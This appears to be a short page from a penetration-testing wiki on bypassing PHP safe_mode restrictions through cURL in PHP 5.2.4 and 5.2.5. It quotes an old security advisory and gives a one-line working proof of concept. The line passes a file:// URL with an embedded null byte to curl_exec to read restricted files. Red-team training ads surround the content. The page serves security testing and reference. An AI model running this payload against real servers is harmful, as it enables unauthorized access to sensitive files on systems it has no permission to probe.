disable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
PHP 5.2.4 and 5.2.5 PHP cURL
From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/
source: http://www.securityfocus.com/bid/27413/info
PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
The issue affects PHP 5.2.5 and 5.2.4.
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Previousdisable_functions bypass - PHP <= 5.2.9 on windowsNextdisable_functions bypass - PHP safe_mode bypass via proc_open() and custom environment Exploit
Last updated